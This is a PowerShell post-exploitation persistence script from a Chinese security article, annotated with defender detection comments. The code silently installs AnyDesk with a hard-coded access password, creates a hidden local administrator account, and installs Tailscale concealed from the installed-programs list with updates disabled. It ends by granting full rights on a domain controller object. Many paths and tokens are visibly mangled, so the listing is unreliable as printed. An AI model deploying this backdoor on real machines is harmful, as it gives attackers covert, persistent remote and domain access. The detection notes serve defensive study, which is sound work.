"[*] Download AnyDesk"
# Stage 1 of the listing: unattended AnyDesk install plus a hidden local
# administrator account. Comments are written for defenders; the code is left
# exactly as printed on the page.
# NOTE(review): several paths below have no separators (e.g.
# "C:Users%USERNAME%AppData...") and look damaged by page extraction, so treat
# the listing as illustrative rather than as a verified script.
#
# Fetches the AnyDesk installer over plain HTTP (no transport integrity) into
# C:\windows\temp using System.Net.WebClient.
# Detection: PowerShell script-block logging (Event ID 4104) records the
# DownloadFile call; Sysmon file-create events (Event ID 11) show a
# remote-access tool binary landing in the Windows temp directory.
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\windows\temp\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
"[*] Install anydesk"
# Silent install that also registers AnyDesk to start with Windows
# (--install, --start-with-win, --silent are passed on the command line).
# Detection: process-creation logging with command lines (Security Event ID
# 4688 or Sysmon Event ID 1) captures these switches verbatim.
cmd.exe /c "c:\windows\temp\AnyDesk.exe --install C:Users%USERNAME%AppDataLocalAnyDesk --start-with-win --silent"
"[*] set anydesk Admin!@#45"
# Pipes a hard-coded unattended-access password into --set-password. The
# literal password is part of the cmd.exe command line, so it ends up in any
# command-line audit log; a fixed string like this is a usable hunting
# indicator for this specific script.
cmd.exe /c "echo Admin!@#45 | C:Users%USERNAME%AppDataLocalAnyDeskAnyDesk.exe --set-password"
# Deletes the downloaded installer and discards all output, so the temp file
# will not be present for later triage; rely on the creation/deletion
# telemetry instead of the file itself.
cmd.exe /c 'del c:\windows\temp\AnyDesk.exe > nul 2>&1'
"[*] Creat user default"
"[*] Set default Whoami!@#45"
# Creates a local account named "default" with a hard-coded password.
# Detection: Security Event ID 4720 (user account created).
cmd.exe /c 'net user default "Whoami!@#45" /add > nul 2>&1'
"[*] Add user to admin"
# Adds that account to the local Administrators group.
# Detection: Security Event ID 4732 (member added to a local group).
cmd.exe /c 'net localgroup Administrators default /add > nul 2>&1'
# Writes a DWORD value named "default" with data 0 under the Winlogon
# SpecialAccounts Userlist key. On Windows this hides the named account from
# the sign-in screen (MITRE ATT&CK T1564.002, Hidden Users).
# Detection: alert on any value written under this key (Sysmon Event ID 13),
# and enumerate local accounts with tooling rather than trusting the logon UI.
cmd.exe /c 'reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist" /v default /t REG_DWORD /d 0 /f > nul 2>&1'
# Waits three seconds, then asks AnyDesk for its ID (--get-id), redirects the
# output to ID.txt in the current working directory, and prints the last line.
# ID.txt is left behind and is a forensic artifact of this script.
sleep 3
cmd.exe /c "for /f ""delims="" %i in ('C:Users%USERNAME%AppDataLocalAnyDeskAnyDesk.exe --get-id') do echo %i" > ID.txt
$id = Get-Item -Path .ID.txt | Get-Content -Tail 1
"[*] ID anydesk $id"
# Stage 2 of the listing: silent Tailscale install, hidden from the installed
# programs list. Comments are written for defenders; code is left as printed.
# NOTE(review): many tokens are run together (e.g. "-n3", "$ping-match",
# "Invoke-WebRequest-Uri", "sleep3") and path separators are missing, which
# looks like extraction damage; do not assume the listing runs as shown.
#
# Reachability check: pings pkgs.tailscale.com and keeps only reply lines
# containing "bytes=32". DNS lookups / ICMP to this host from servers that do
# not use Tailscale are a cheap network indicator.
$ping = ping -n3 pkgs.tailscale.com -w5 | findstr "bytes=32"
if ($ping-match"bytes=32") {
"[*] Ativando suporte a TSL versao 1, 1.1, 1.2, 1.3"
# The banner above says TLS 1.0-1.3, but the values actually assigned are
# Tls, Tls11, Tls12 and Ssl3; Tls13 is not listed and SSL 3.0 is enabled.
# The second assignment repeats the same set as a string. Enabling SSL 3.0 /
# TLS 1.0 weakens the protocol floor for .NET web requests in this session.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls,[Net.SecurityProtocolType]::Tls11,[Net.SecurityProtocolType]::Tls12,[Net.SecurityProtocolType]::Ssl3
[Net.ServicePointManager]::SecurityProtocol = "Tls, Tls11, Tls12, Ssl3"
# Looks up a service named "tailscale" and skips the install when it exists.
# NOTE(review): errors are redirected to $nul, which is never assigned in the
# visible script (it is not the built-in $null) - confirm intent.
$status = (get-service tailscale).DisplayName 2> $nul
if ($status-match'tailscale') {
"[*] TailScale is already part of the system"
}
else
{
try
{
# Probes the arm64 1.78.1 MSI URL only to obtain an HTTP status code; the
# response body is not used.
$Response = Invoke-WebRequest-Uri"https://pkgs.tailscale.com/stable/tailscale-setup-1.78.1-arm64.msi"
$StatusCode = $Response.StatusCode
} catch {
# On failure, takes the status code from the exception's response object.
$StatusCode = $_.Exception.Response.StatusCode.value__
}
if ($StatusCode-match'200') {
"[*] Downloading Tailscale..."
# Progress output is suppressed, and the file actually downloaded is the
# amd64 1.76.6 MSI - a different architecture and version from the URL probed
# above. It is written under $env:public (separator appears lost in the
# listing). Detection: an MSI written to the Public profile by PowerShell.
$ProgressPreference = 'SilentlyContinue';
Measure-Command-Expression {
Invoke-WebRequest-Uri https://pkgs.tailscale.com/stable/tailscale-setup-1.76.6-amd64.msi -OutFile$env:publictailscale-setup-1.76.6-amd64.msi
} -ErrorAction'SilentlyContinue' | Out-Null
}
else
{
"[*] Page not found"
}
# Confirms the MSI exists on disk; the boolean from Test-Path is compared with
# the string "true".
$msi = Test-Path$env:publictailscale-setup-1.76.6-amd64.msi -ErrorAction'SilentlyContinue'
if ($msi-eq"true")
{
"[*] Installing Tailscale..."
# Quiet install (/qn) with Tailscale MSI properties that turn off update
# checks and update installs, suppress the client launch, and hide the update
# menu, so the host stays pinned on 1.76.6 with no visible UI.
# Detection: msiexec.exe command lines carrying TS_* properties (Security
# Event ID 4688 / Sysmon Event ID 1), MsiInstaller entries in the Application
# log, and a new-service event (System Event ID 7045).
msiexec.exe /i $env:publictailscale-setup-1.76.6-amd64.msi TS_CHECKUPDATES="never" TS_INSTALLUPDATES="never" TS_NOLAUNCH="1" TS_UPDATEMENU="hide" /qn | Out-Null
sleep3
"[*] Hiding Tailscale from Control Panel..."
# Sets SystemComponent=1 on the product's Uninstall entry, which removes it
# from the installed-programs view. Software inventory that reads only that
# view will miss it; inventory by service name and by files on disk instead,
# and alert on SystemComponent being written under Uninstall keys (Sysmon
# Event ID 13).
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall{4C041253-D35B-5889-A173-B08110EB2062}" /v SystemComponent /t REG_DWORD /d 1 /f | Out-Null
"[*] Installation completed!"
}
else
{
"[*] Error downloading the file..."
"[*] - Installation file not found..."
}
}
}
else
{
# Reached when the ping check above returned no "bytes=32" reply line.
"[!] Installation was aborted! Possible disconnection with the domain pkgs.tailscale.com"
"[!] - No connection to the domain pkgs.tailscdale.com"
}
# Stage 3 of the listing: directory ACL change. Add-DomainObjectAcl is not
# defined anywhere in this listing (presumably the PowerView function of that
# name - confirm). As written it requests "All" rights for the principal in
# $sid on the directory object identified as "DC".
# NOTE(review): $sid is never assigned in the visible script, and the
# "All-Verbose" argument looks run together by page extraction.
# Detection: with Directory Service Changes auditing enabled, ACL edits on
# domain objects are logged as Security Event ID 5136 (nTSecurityDescriptor
# modified); review ACLs on domain controller and domain-root objects
# periodically for unexpected full-control entries.
Add-DomainObjectAcl -TargetIdentity "DC" -PrincipalIdentity $sid -Rights All-Verbose
原文始发于微信公众号(looch):后渗透维权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。